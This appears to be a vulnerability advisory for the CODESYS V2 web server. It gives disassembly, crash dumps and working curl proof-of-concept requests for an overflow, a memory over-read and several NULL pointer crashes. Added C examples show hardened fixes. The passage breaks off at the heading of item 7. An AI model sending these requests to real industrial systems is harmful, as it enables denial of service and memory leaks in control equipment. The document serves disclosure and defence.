CODESYS V2 Web Server Multiple Vulnerabilities
Synopsis
1) Buffer Overflow
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
A buffer overflow condition exists when copying data from a 0x100-byte stack-based buffer to a heap-based communication buffer. The copy size is controlled by the attacker:
.text:00404EE8 loc_404EE8:                             ; CODE XREF: FillPlcRequest+426↑j
.text:00404EE8     mov     edx, sz_array_indx
.text:00404EEE     cmp     ty_array[edx*4], 8
.text:00404EF6     jnz     short loc_404F1C
.text:00404EF8 ; ty = 8
.text:00404EF8     mov     eax, sz_array_indx
.text:00404EFD     mov     ecx, sz_array[eax*4]
.text:00404F04     push    ecx                     ; attacker-controlled copy size
.text:00404F05     lea     edx, [ebp+sbuf100]      ; 0x100-byte stack buffer
.text:00404F0B     push    edx                     ; buffer over-read
.text:00404F0C     mov     eax, pbCommBufCur       ; 0x3fff-byte heap buffer
.text:00404F11     push    eax                     ; buffer over-write
.text:00404F12     call    _memcpy
An unauthenticated remote attacker can trigger this vulnerability with the following curl command:
curl -d '|1|6|0|co|<copy_size>|8|v0x1|<data>|' http://<codesys_v2_web_server>:8080/
When handling this message, the CODESYS V2 web server fills a 0x100-byte stack-based buffer with <data>, so at most 0x100 bytes of <data> end up in that buffer. The server then copies <copy_size> bytes from the stack-based buffer to a heap-based communication buffer without checking <copy_size> against the size of either buffer. By default, the communication buffer has 0x3fff (16383) bytes, but the size is configurable via the 'buffer-size' setting in the web server configuration file (webserver_conf.xml).
A large attacker-controlled <copy_size> can cause a buffer over-read on the stack-based buffer or a buffer over-write on the heap-based communication buffer, which can crash the web server or the CODESYS Control runtime system:
curl -d '|1|6|0|co|20000|8|v0x1|AAAAAAAA|' http://<codesys_v2_web_server>:8080/

0:004> g
(1e90.1bf8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=64003100 ebx=016f0000 ecx=0184a518 edx=00100000 esi=0170afe0 edi=01840000
eip=77da1f6b esp=0014c83c ebp=0014c860 iopl=0         nv up ei ng nz na pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010287
ntdll!RtlpInsertFreeBlock+0x10b:
77da1f6b 8b10            mov     edx,dword ptr [eax]  ds:0023:64003100=????????
In addition, a large <copy_size> results in information disclosure: the bytes copied past the end of <data> are stack contents, and they are sent over the network when the web server is configured to talk to an external CODESYS Control runtime system via the 'target-ip-address' setting in webserver_conf.xml:
curl -d '|1|6|0|co|1000|8|v0x1|AAAAAAAA|' http://<codesys_v2_web_server>:8080/

Wireshark captured TCP stream from the web server to an external CODESYS Control runtime system (rows indented to the right are the runtime system's replies):

00000000  cc cc 01 00 ef 03 00 00 00 00 00 00 00 00 00 00 ........ ........
00000010  00 00 00 00 03 00 00 00 3c 77 06 00 00 00 01 41 ........ <w.....A
00000020  41 41 41 41 41 41 41 00 00 00 00 00 00 00 00 00 AAAAAAA. ........
00000030  00 00 00 e0 c9 14 00 ec 03 00 00 d0 c5 14 00 00 ........ ........
00000040  c9 14 00 01 00 00 00 00 00 00 00 01 00 00 00 b4 ........ ........
00000050  c5 14 00 00 00 00 00 01 00 00 00 00 00 00 00 d0 ........ ........
00000060  c5 14 00 01 00 00 00 80 7b e1 ff ff ff ff ff 01 ........ {.......
00000070  00 00 00 00 00 00 00 ec 03 00 00 01 00 00 00 00 ........ ........
00000080  00 00 00 01 00 00 00 00 00 00 00 fc c5 14 00 01 ........ ........
00000090  00 00 00 80 7b e1 ff ff ff ff ff 01 00 00 00 00 ....{... ........
000000A0  00 be 02 ec 03 00 00 01 00 00 00 a4 e7 fc e8 24 ........ .......$
000000B0  c5 14 00 24 c6 14 00 9c c6 14 00 40 5c 52 75 00 ...$.... ...@\Ru.
000000C0  6e bc 9d fe ff ff ff ac c6 14 00 1e 5f f8 76 ec n....... ...._.v.
000000D0  03 00 00 d4 c8 14 00 00 00 00 00 00 00 00 00 e0 ........ ........
000000E0  c9 14 00 90 c6 14 00 3a c8 0d 59 60 de 41 00 60 .......: ..Y`.A.`
000000F0  de 41 00 00 e0 25 00 1e 5f f8 76 ec 03 00 00 00 .A...%.. _.v.....
00000100  c9 14 00 e0 91 64 00 00 2e 62 00 f8 5f 63 00 bc .....d.. .b.._c..
00000110  c6 14 00 4e c8 0d 59 60 de 41 00 60 de 41 00 00 ...N..Y` .A.`.A..
00000120  00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 .......0 ........
00000130  00 00 00 70 cb 14 00 c4 49 40 00 38 f6 42 00 06 ...p.... I@.8.B..
00000140  00 00 00 bc f2 42 00 c8 49 46 00 04 00 00 00 00 .....B.. IF......
00000150  00 00 00 80 7b f8 76 4e 36 e2 2f fe ff ff ff ec ....{.vN 6./.....
00000160  c9 14 00 41 0e 41 00 ec 03 00 00 d4 c8 14 00 00 ...A.A.. ........
00000170  00 00 00 00 00 00 00 e0 c9 14 00 60 ff 14 00 80 ........ ...`....
00000180  7b f8 76 4e 36 e2 2f fe ff ff ff 18 ca 14 00 41 {.vN6./. .......A
00000190  0e 41 00 ec 03 00 00 00 c9 14 00 00 00 00 00 00 .A...... ........
000001A0  00 00 00 0c ca 14 00 00 00 00 00 00 00 00 00 00 ........ ........
000001B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000001C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000001D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000001E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000001F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000200  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000210  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000220  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000230  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000240  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000250  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000260  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000270  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000280  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000290  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000002A0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000002B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000002C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000002D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000002E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
000002F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000300  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000310  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000320  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000330  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000340  00 00 00 00 00 00 00 00 00 00 00 7f de d9 77 24 ........ ......w$
00000350  a7 90 85 00 00 94 01 30 04 00 00 d0 ca 14 00 df .......0 ........
00000360  07 00 d8 00 00 00 00 df 07 00 d8 3a 0e df 77 83 ........ ...:..w.
00000370  99 51 75 ec 03 00 00 dc 02 00 00 00 00 00 00 00 .Qu..... ........
00000380  00 00 00 08 c9 14 00 17 20 01 00 f8 c8 14 00 10 ........  .......
00000390  00 00 00 00 00 00 00 00 00 00 00 e4 e8 fc e8 10 ........ ........
000003A0  98 51 75 e0 91 64 00 ec 03 00 00 c0 c9 14 00 01 .Qu..d.. ........
000003B0  00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 18 ....... ........
000003C0  00 00 00 00 00 00 00 dc 02 00 00 10 98 51 75 e8 ........ .....Qu.
000003D0  78 62 00 00 00 00 00 dc 02 00 00 08 c9 14 00 00 xb...... ........
000003E0  00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 e8 ... .... ........
000003F0  c8 14 00 dc 02 00 00 60 ff 14 00 40 5c 52 75 90 .......` ...@\Ru.
00000400  68 bc 9d fe ff ff ff                            h......
    00000000  cc cc 01 00 02 00 00 00 00 00 00 00 00 00 00 00 ........ ........
    00000010  00 00 00 00 07 00 00 00 47 00                   ........ G.
00000407  66 66 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ff...... ........
00000417  00 00 00 00 04 00 00 00                         ........
    0000001A  66 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff...... ........
    0000002A  00 00 00 00 04 00 00 00                         ........
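The missing check in the 'co' handler, shown as an added C example written for this page (it is not code from the CODESYS web server or from the advisory): the pattern from the listing is reconstructed beside a hardened form that bounds the copy length by the bytes actually placed in the stack buffer and by the room left in the communication buffer, so that both the 20000-byte request (heap over-write) and the 1000-byte request (stack over-read) above are refused. The struct layout and function names are assumptions; the 0x100 and 0x3fff sizes are the ones given in the text.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STACK_BUF_SIZE 0x100   /* sbuf100 in the listing above */
#define COMM_BUF_SIZE  0x3fff  /* default 'buffer-size' in webserver_conf.xml */

/* Constructed view of the fields the 'co' handler uses from
 * |1|6|0|co|<copy_size>|8|v0x1|<data>|. */
struct co_request {
    size_t copy_size;      /* <copy_size>, attacker-controlled */
    const uint8_t *data;   /* <data> */
    size_t data_len;
};

/* The pattern from the listing: <data> is clipped to the 0x100-byte stack
 * buffer, but the memcpy into the heap communication buffer takes
 * <copy_size> unchanged, so it over-reads sbuf and over-writes comm.
 * Kept only for comparison; never call it with a hostile copy_size. */
static size_t fill_comm_vulnerable(const struct co_request *req, uint8_t *comm)
{
    uint8_t sbuf[STACK_BUF_SIZE] = {0};
    size_t n = req->data_len < STACK_BUF_SIZE ? req->data_len : STACK_BUF_SIZE;
    memcpy(sbuf, req->data, n);
    memcpy(comm, sbuf, req->copy_size);   /* unrelated to n and to the comm size */
    return req->copy_size;
}

/* Hardened form: the copy length may not exceed what was actually placed
 * in sbuf (otherwise stack bytes leak) nor the space left in comm
 * (otherwise the heap is corrupted). Returns bytes copied, or -1. */
static long fill_comm_checked(const struct co_request *req,
                              uint8_t *comm, size_t comm_len)
{
    uint8_t sbuf[STACK_BUF_SIZE] = {0};

    if (req->data_len > STACK_BUF_SIZE)
        return -1;                         /* <data> does not fit the stack buffer */
    memcpy(sbuf, req->data, req->data_len);

    if (req->copy_size > req->data_len)
        return -1;                         /* would read past <data> inside sbuf */
    if (req->copy_size > comm_len)
        return -1;                         /* would write past the comm buffer */

    memcpy(comm, sbuf, req->copy_size);
    return (long)req->copy_size;
}

/* Run the hardened handler for a given <copy_size> and <data> against a
 * communication buffer of the default size. */
static long check_co(size_t copy_size, const char *data)
{
    static uint8_t comm[COMM_BUF_SIZE];
    struct co_request req = { copy_size, (const uint8_t *)data, strlen(data) };
    return fill_comm_checked(&req, comm, sizeof comm);
}

int main(void)
{
    static uint8_t comm[COMM_BUF_SIZE];
    struct co_request ok = { 8, (const uint8_t *)"AAAAAAAA", 8 };

    /* A well-formed request behaves identically in both versions. */
    printf("vulnerable, copy_size=8:     %zu bytes\n", fill_comm_vulnerable(&ok, comm));
    printf("checked,    copy_size=8:     %ld bytes\n", check_co(8, "AAAAAAAA"));
    /* The advisory's two requests are refused instead of crashing or leaking. */
    printf("checked,    copy_size=20000: %ld (heap over-write refused)\n", check_co(20000, "AAAAAAAA"));
    printf("checked,    copy_size=1000:  %ld (stack over-read refused)\n", check_co(1000, "AAAAAAAA"));
    return 0;
}
```

The two comparisons in fill_comm_checked are the whole fix: the size field of the message is only ever allowed to describe data that the parser has already placed in the source buffer and that fits the destination.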
2) Heap-based Buffer Over-read
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
A heap-based buffer over-read/over-write condition exists when the web server performs an in-place XOR-based encoding of user-supplied data. The amount of data to encode is controlled by the attacker and can be larger than the actual size of the data:
.text:00409CB8 xor_encode_loop:                        ; CODE XREF: XorDataInPlace+AE↓j
.text:00409CB8     mov     ecx, [ebp+i]
.text:00409CBB     add     ecx, 1
.text:00409CBE     mov     [ebp+i], ecx
.text:00409CC1
.text:00409CC1 loc_409CC1:                             ; CODE XREF: XorDataInPlace+4F↑j
.text:00409CC1     mov     edx, [ebp+i]
.text:00409CC4     cmp     edx, [ebp+arg_len]      ; attacker-controlled
.text:00409CC4                                     ; encode length
.text:00409CC7     jge     short loc_409D17
.text:00409CC9     mov     al, [ebp+var_C]
.text:00409CCC     mov     [ebp+var_10], al
.text:00409CCF     mov     ecx, [ebp+arg_pbInOutData]
.text:00409CD2     add     ecx, [ebp+i]
.text:00409CD5     mov     dl, [ecx]               ; heap buffer over-read
.text:00409CD7     mov     [ebp+var_C], dl
.text:00409CDA     mov     eax, [ebp+indx]
.text:00409CDD     add     eax, 1                  ; use next indx in the xor
.text:00409CDD                                     ; table to encode the next
.text:00409CDD                                     ; input byte
.text:00409CE0     and     eax, 800000FFh
.text:00409CE5     jns     short loc_409CEE
.text:00409CE7     dec     eax
.text:00409CE8     or      eax, 0FFFFFF00h
.text:00409CED     inc     eax
.text:00409CEE
.text:00409CEE loc_409CEE:                             ; CODE XREF: XorDataInPlace+7E↑j
.text:00409CEE     mov     [ebp+indx], eax
.text:00409CF1     movsx   ecx, [ebp+var_10]
.text:00409CF5     mov     edx, [ebp+arg_pbInOutData]
.text:00409CF8     add     edx, [ebp+i]
.text:00409CFB     movsx   eax, byte ptr [edx]
.text:00409CFE     xor     ecx, eax
.text:00409D00     mov     edx, [ebp+indx]
.text:00409D03     xor     eax, eax
.text:00409D05     mov     al, ds:xor_table[edx]
.text:00409D0B     xor     ecx, eax                ; data is encoded as:
.text:00409D0B                                     ; data[i] = data[i-1] ^ data[i] ^
.text:00409D0B                                     ;           xor_table[indx]
.text:00409D0D     mov     edx, [ebp+arg_pbInOutData]
.text:00409D10     add     edx, [ebp+i]
.text:00409D13     mov     [edx], cl               ; heap buffer over-write
.text:00409D15     jmp     short xor_encode_loop
An unauthenticated remote attacker can trigger this vulnerability with the following curl command:
curl -d '|11|<filename>.wtc|<xor_encode_len>|<base64_encoded>|<starting_indx_of_the_xor_table>|' http://<codesys_v2_web_server>:8080/
When handling this message, the CODESYS V2 web server does the following:
- Base64-decode <base64_encoded> to a heap-based buffer
- Encode <xor_encode_len> bytes of the base64-decoded data using an XOR-based algorithm
- Write the XOR-encoded data to <webroot>/<filename>.wtc
If <xor_encode_len> is larger than the size of the base64-decoded data, a heap-based buffer over-write can cause heap corruption, likely crashing the web server or the CODESYS Control runtime system:
curl -d '|11|file1.wtc|4096|QUFBQUFBQUE=|0|' http://<codesys_v2_web_server>:8080/

0:001> g
memory check error at 0x01940A64 = 0x2E, should be 0xFD.
memory check error at 0x01940A65 = 0x4E, should be 0xFD.
memory check error at 0x01940A66 = 0x1D, should be 0xFD.
memory check error at 0x01940A67 = 0x26, should be 0xFD.
(2570.ec4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=c1ed4d5c ebx=01940a30 ecx=54571bbf edx=01940a70 esi=01940a68 edi=01940000
eip=77d9ffb7 esp=0014c974 ebp=0014caac iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlpFreeHeap+0x797:
77d9ffb7 8b00            mov     eax,dword ptr [eax]  ds:0023:c1ed4d5c=????????
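An added C reconstruction of the encoding loop above, beside a bounded version; this is example code written for this page, not code from the web server. The xor_table contents and the initial value of the previous-byte register (assumed 0) are not in the advisory and are constructed here; the and/jns/dec/or/inc sequence in the listing is the compiler's signed modulo-256 idiom, so the table index advances as (indx + 1) % 256. The decode routine is included only to check that the reconstruction round-trips. "QUFBQUFBQUE=" is the base64 encoding of eight 'A' bytes, which is why the 4096-byte request above runs off the end of an 8-byte heap allocation.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for the server's 256-entry xor_table: the real contents are not
 * in the advisory, so a constructed filler is used (any table serves for
 * demonstrating the length bug and the round trip). */
static uint8_t xor_table[256];

static void init_xor_table(void)
{
    for (int i = 0; i < 256; i++)
        xor_table[i] = (uint8_t)(i * 37 + 11);
}

/* Reconstruction of XorDataInPlace's loop: each output byte is
 * data[i-1] ^ data[i] ^ xor_table[indx], with indx advanced by one
 * (mod 256) before each use. 'len' is the attacker-supplied
 * <xor_encode_len>; nothing ties it to the size of the buffer, so i runs
 * past the allocation. Kept for comparison only. */
static void xor_encode_unchecked(uint8_t *data, int len, int indx)
{
    uint8_t prev = 0;   /* initial previous-byte value is not shown; assumed 0 */
    for (int i = 0; i < len; i++) {
        uint8_t cur = data[i];                    /* over-read once i >= allocation */
        indx = (indx + 1) % 256;
        data[i] = prev ^ cur ^ xor_table[indx];   /* over-write, same condition */
        prev = cur;
    }
}

/* Bounded form: refuse any len larger than the buffer that actually holds
 * the base64-decoded data, and keep the table index within 0..255.
 * Returns 0 on success, -1 if len exceeds buf_len. */
static int xor_encode_in_place(uint8_t *buf, size_t buf_len, size_t len, int start_indx)
{
    if (len > buf_len)
        return -1;
    uint8_t prev = 0;
    unsigned indx = (unsigned)start_indx & 0xff;
    for (size_t i = 0; i < len; i++) {
        uint8_t cur = buf[i];
        indx = (indx + 1) & 0xff;
        buf[i] = prev ^ cur ^ xor_table[indx];
        prev = cur;
    }
    return 0;
}

/* Inverse of the bounded encoder, for verification: the chained term is
 * the previous plaintext byte, so decoding walks forward recovering it. */
static int xor_decode_in_place(uint8_t *buf, size_t buf_len, size_t len, int start_indx)
{
    if (len > buf_len)
        return -1;
    uint8_t prev = 0;
    unsigned indx = (unsigned)start_indx & 0xff;
    for (size_t i = 0; i < len; i++) {
        indx = (indx + 1) & 0xff;
        uint8_t cur = buf[i] ^ prev ^ xor_table[indx];
        buf[i] = cur;
        prev = cur;
    }
    return 0;
}

/* The |11 request above: the decoded data is eight 'A' bytes, then
 * <xor_encode_len> bytes are encoded in place. Returns the bounded
 * encoder's verdict for that length. */
static int wtc_encode_len_check(size_t xor_encode_len)
{
    uint8_t decoded[8];
    memset(decoded, 'A', sizeof decoded);
    init_xor_table();
    return xor_encode_in_place(decoded, sizeof decoded, xor_encode_len, 0);
}

/* 1 if the unchecked reconstruction and the bounded encoder agree on an
 * in-range length and decoding restores the input, else 0. */
static int xor_roundtrip_ok(void)
{
    uint8_t a[8], b[8];
    memset(a, 'A', sizeof a);
    memset(b, 'A', sizeof b);
    init_xor_table();
    xor_encode_unchecked(a, 8, 0);                 /* in range, safe to run */
    if (xor_encode_in_place(b, sizeof b, 8, 0) != 0 || memcmp(a, b, 8) != 0)
        return 0;
    if (xor_decode_in_place(b, sizeof b, 8, 0) != 0)
        return 0;
    return memcmp(b, "AAAAAAAA", 8) == 0;
}

int main(void)
{
    printf("encode_len=4096 on 8 decoded bytes: %d (refused)\n", wtc_encode_len_check(4096));
    printf("encode_len=8    on 8 decoded bytes: %d\n", wtc_encode_len_check(8));
    printf("round trip ok: %d\n", xor_roundtrip_ok());
    return 0;
}
```

Note that the encoding is a reversible byte chain rather than any form of protection: anyone who recovers xor_table can decode a .wtc file, so the check that matters for the server is the length bound, not the table.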
3) Message |9 NULL Pointer Dereference
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
A NULL pointer dereference can occur when the web server processes a malformed message starting with |9:
.text:0040314C     mov     eax, [ebp+arg_pbData]
.text:0040314F     movsx   ecx, byte ptr [eax]
.text:00403152     cmp     ecx, 39h                ; '9'
.text:00403155     jnz     loc_4031F3
.text:0040315B ; |9
.text:0040315B     mov     edx, [ebp+arg_pbData]
.text:0040315E     add     edx, 2
.text:00403161     mov     [ebp+var_50], edx
.text:00403164     mov     [ebp+var_4C], 0
.text:0040316B     mov     eax, [ebp+arg_pbData]
.text:0040316E     add     eax, 2
.text:00403171     mov     [ebp+arg_pbData], eax
.text:00403174     push    7Ch                     ; '|' ; int
.text:00403176     mov     ecx, [ebp+arg_pbData]
.text:00403179     push    ecx                     ; char *
.text:0040317A     call    _strchr
.text:0040317F     add     esp, 8
.text:00403182     mov     [ebp+var_48], eax       ; returned pointer not
.text:00403182                                     ; checked for NULL
.text:00403185     mov     edx, [ebp+var_48]
.text:00403188     mov     byte ptr [edx], 0       ; NULL ptr write
An unauthenticated remote attacker can exploit this vulnerability to crash the web server or the CODESYS Control runtime system:
curl -d '|9|0000' http://<codesys_v2_web_server>:8080/

(1314.1164): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files\3S Software\CODESYS V2.3\Visu\webserver.exe
eax=00000000 ebx=0021f000 ecx=00000000 edx=00000000 esi=0041de60 edi=0041de60
eip=00403188 esp=0014c698 ebp=0014cb70 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
webserver+0x3188:
00403188 c60200          mov     byte ptr [edx],0           ds:0023:00000000=??
4) Message |10 NULL Pointer Dereference
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
A NULL pointer dereference can occur when the web server processes a malformed message starting with |10:
.text:0040335B     mov     eax, [ebp+arg_pbData]
.text:0040335E     movsx   ecx, byte ptr [eax]
.text:00403361     cmp     ecx, 31h                ; '1'
.text:00403364     jnz     loc_403415
.text:0040336A     mov     edx, [ebp+arg_pbData]
.text:0040336D     movsx   eax, byte ptr [edx+1]
.text:00403371     cmp     eax, 30h                ; '0'
.text:00403374     jnz     loc_403415
.text:0040337A ; |10
.text:0040337A     mov     ecx, [ebp+arg_pbData]
.text:0040337D     add     ecx, 3
.text:00403380     mov     [ebp+var_64], ecx
.text:00403383     mov     [ebp+var_60], 0
.text:0040338A     mov     edx, [ebp+arg_pbData]
.text:0040338D     add     edx, 3
.text:00403390     mov     [ebp+arg_pbData], edx
.text:00403393     push    7Ch                     ; '|'
.text:00403395     mov     eax, [ebp+arg_pbData]
.text:00403398     push    eax
.text:00403399     call    _strchr
.text:0040339E     add     esp, 8
.text:004033A1     mov     [ebp+var_5C], eax       ; returned pointer not
.text:004033A1                                     ; checked for NULL
.text:004033A4     mov     ecx, [ebp+var_5C]
.text:004033A7     mov     byte ptr [ecx], 0       ; NULL ptr write
An unauthenticated remote attacker can exploit this vulnerability to crash the web server or the CODESYS Control runtime system:
curl -d '|10|0' http://<codesys_v2_web_server>:8080/

(ef4.e58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files\3S Software\CODESYS V2.3\Visu\webserver.exe
eax=00000000 ebx=002f9000 ecx=00000000 edx=00520a60 esi=0041de60 edi=0041de60
eip=004033a7 esp=0014c698 ebp=0014cb70 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
webserver+0x33a7:
004033a7 c60100          mov     byte ptr [ecx],0           ds:0023:00000000=??
5) Message |b or |e NULL Pointer Dereference
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
A NULL pointer dereference can occur when the web server processes a malformed message starting with |b or |e:
.text:00403A7D     mov     eax, [ebp+arg_pbData]
.text:00403A80     movsx   ecx, byte ptr [eax]
.text:00403A83     cmp     ecx, 62h                ; 'b'
.text:00403A86     jz      short loc_403A97
.text:00403A88     mov     edx, [ebp+arg_pbData]
.text:00403A8B     movsx   eax, byte ptr [edx]
.text:00403A8E     cmp     eax, 65h                ; 'e'
.text:00403A91     jnz     loc_403E4B
.text:00403A97 ; |b or |e
[...]
.text:00403C88     push    7Ch                     ; '|'
.text:00403C8A     mov     eax, [ebp+arg_pbData]
.text:00403C8D     push    eax
.text:00403C8E     call    _strchr
.text:00403C93     add     esp, 8
.text:00403C96     mov     [ebp+var_84], eax       ; returned pointer not
.text:00403C96                                     ; checked for NULL
.text:00403C9C     mov     ecx, [ebp+var_84]
.text:00403CA2     mov     byte ptr [ecx], 0       ; NULL ptr write
An unauthenticated remote attacker can exploit this vulnerability to crash the web server or the CODESYS Control runtime system:
curl -d '|b|11|22|33|44|55' http://<codesys_v2_web_server>:8080/

(1ccc.6b8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files\3S Software\CODESYS V2.3\Visu\webserver.exe
eax=00000000 ebx=003b4000 ecx=00000000 edx=00a1a49c esi=0041de60 edi=0041de60
eip=00403ca2 esp=0014c698 ebp=0014cb70 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
webserver+0x3ca2:
00403ca2 c60100          mov     byte ptr [ecx],0           ds:0023:00000000=??
6) Message Parsing State 4 NULL Pointer Dereference
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
A NULL pointer dereference can occur when the web server processes a malformed message in parsing state 4:
.text:00402D75     mov     eax, [ebp+psHexNum]     ; NULL ptr if the string in
.text:00402D75                                     ; the first argument of the
.text:00402D75                                     ; function does not start
.text:00402D75                                     ; with character v, w or y
.text:00402D78     add     eax, 1
.text:00402D7B     mov     [ebp+psHexNum], eax
.text:00402D7E     mov     ecx, [ebp+psHexNum]
.text:00402D81     movsx   edx, byte ptr [ecx-1]   ; NULL ptr read
An unauthenticated remote attacker can exploit this vulnerability to crash the web server or the CODESYS Control runtime system:
curl -d '|0|5|0|co|1000|8|a0x1|' http://<codesys_v2_web_server>:8080/

(2640.259c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files\3S Software\CODESYS V2.3\Visu\webserver.exe
eax=00000001 ebx=003ac000 ecx=00000001 edx=00000001 esi=0041de60 edi=0041de60
eip=00402d81 esp=0014c208 ebp=0014c234 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
webserver+0x2d81:
00402d81 0fbe51ff        movsx   edx,byte ptr [ecx-1]       ds:0023:00000000=??
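The common defect in items 3 to 6 is a parser that takes a pointer from strchr, or from a helper that returns NULL for an unexpected token prefix, and reads or writes through it without a check. As an added example (not part of the advisory and not the CODESYS code base), the C below splits the '|'-delimited message layout used throughout this page and rejects the four crashing requests shown above instead of faulting. The field positions assumed for the 'co' layout (field 7 as the v/w/y-prefixed hex token) follow the request from item 1; the function names are my own, and all other message types are accepted once every field is terminated.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_FIELDS 16
#define MAX_MSG    512

/* Cut the next '|'-terminated field out of *cursor in place. This is the
 * server's strchr-then-write-NUL step, except that a missing delimiter
 * is returned to the caller as NULL instead of being written through. */
static char *next_field(char **cursor)
{
    char *end;
    if (*cursor == NULL || (end = strchr(*cursor, '|')) == NULL)
        return NULL;
    *end = '\0';
    char *field = *cursor;
    *cursor = end + 1;
    return field;
}

/* Split "|f0|f1|...|fn|" into NUL-terminated fields. Returns the field
 * count, or -1 if the message does not start with '|', has more than
 * max_fields fields, or any field lacks its closing '|'. */
static int split_message(char *msg, char *fields[], int max_fields)
{
    if (msg[0] != '|')
        return -1;
    char *cursor = msg + 1;
    int n = 0;
    while (*cursor != '\0') {
        if (n == max_fields || (fields[n] = next_field(&cursor)) == NULL)
            return -1;
        n++;
    }
    return n;
}

/* Parse the typed hex token (v0x1, w0x1, y0x1). Item 6 shows the server's
 * parser handing back a NULL pointer for any other leading character and
 * then reading through it; here an unknown prefix is an error. */
static int parse_typed_hex(const char *tok, unsigned long *value)
{
    if (tok == NULL || tok[0] == '\0' || strchr("vwy", tok[0]) == NULL)
        return -1;
    char *end;
    errno = 0;
    unsigned long v = strtoul(tok + 1, &end, 16);
    if (end == tok + 1 || *end != '\0' || errno == ERANGE)
        return -1;
    *value = v;
    return 0;
}

/* Validate one request. Returns 0 if it is well formed, -1 otherwise.
 * Only the 'co' layout from item 1 gets a field-level check here
 * (field 7 must be a typed hex token). */
static int handle_message(const char *raw)
{
    char buf[MAX_MSG];
    char *fields[MAX_FIELDS];

    if (strlen(raw) >= sizeof buf)
        return -1;
    strcpy(buf, raw);                  /* parsing modifies the buffer in place */

    int n = split_message(buf, fields, MAX_FIELDS);
    if (n < 1)
        return -1;

    if (n >= 7 && strcmp(fields[3], "co") == 0) {
        unsigned long v;
        if (parse_typed_hex(fields[6], &v) != 0)
            return -1;
    }
    return 0;
}

int main(void)
{
    /* The four crashing requests from items 3 to 6, then two well-formed ones. */
    const char *samples[] = {
        "|9|0000", "|10|0", "|b|11|22|33|44|55", "|0|5|0|co|1000|8|a0x1|",
        "|9|0000|", "|1|6|0|co|8|8|v0x1|AAAAAAAA|",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-32s -> %s\n", samples[i],
               handle_message(samples[i]) == 0 ? "accepted" : "rejected");
    return 0;
}
```

Every message handler in the listings above performs the same strchr-and-NUL step on its own; routing them through one helper that cannot return a dereferenceable-looking NULL is what removes the whole class of crash, not patching the four sites individually.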
7) Message |6 Invalid Memory Access DoS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
